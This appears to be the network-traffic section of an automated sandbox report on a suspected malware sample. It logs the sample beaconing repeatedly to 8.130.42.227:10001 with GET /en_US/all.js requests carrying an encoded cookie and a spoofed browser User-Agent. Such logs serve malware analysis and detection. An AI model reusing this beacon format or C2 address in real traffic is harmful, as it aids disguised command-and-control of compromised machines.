                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:51.999813080 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:53.537100077 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:53 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                97192.168.2.4498348.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:53.834593058 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:55.387809038 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:55 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                98192.168.2.4498358.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:55.513971090 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:56.475521088 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:56 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                99192.168.2.4498368.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:56.593599081 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:57.540667057 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:57 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                100192.168.2.4498378.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:57.656733036 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:58.615809917 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:58 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                101192.168.2.4498388.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:58.742556095 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:59.713992119 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:59 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                102192.168.2.4498398.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:59.848725080 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:00.832353115 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:00 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                103192.168.2.4498408.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:01.118943930 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:02.068789005 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:01 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                104192.168.2.4498418.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:02.204703093 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:03.153043985 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:02 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                105192.168.2.4498428.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:03.290126085 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:04.241883039 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:04 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                106192.168.2.4498438.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:04.541111946 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:05.506321907 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:05 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                107192.168.2.4498448.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:05.639437914 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:06.611948967 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:06 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                108192.168.2.4498458.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:06.769355059 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:07.713140011 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:07 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                109192.168.2.4498468.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:07.890803099 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:08.837522984 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:08 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                110192.168.2.4498478.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:08.967098951 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:09.922214985 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:09 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                111192.168.2.4498488.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:10.142796040 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:11.239603996 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:11 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                112192.168.2.4498498.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:11.404921055 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:12.383945942 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:12 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                113192.168.2.4498508.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:12.566149950 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:13.536622047 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:13 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                114192.168.2.4498518.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:13.654870033 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:14.618599892 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:14 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                115192.168.2.4498528.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:14.780076981 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:15.770656109 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:15 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                116192.168.2.4498538.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:15.970824957 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:16.917601109 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:16 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                117192.168.2.4498548.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:17.060981989 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:18.005870104 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:17 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                118192.168.2.4498558.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:18.191450119 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:19.142124891 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:18 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                119192.168.2.4498568.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:19.264523983 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:20.207957983 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:20 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                120192.168.2.4498578.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:20.330912113 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:21.334633112 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:21 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                121192.168.2.4498588.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:21.464631081 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:22.470978975 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:22 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                122192.168.2.4498598.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:19:22.655162096 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:23.599531889 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:23 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


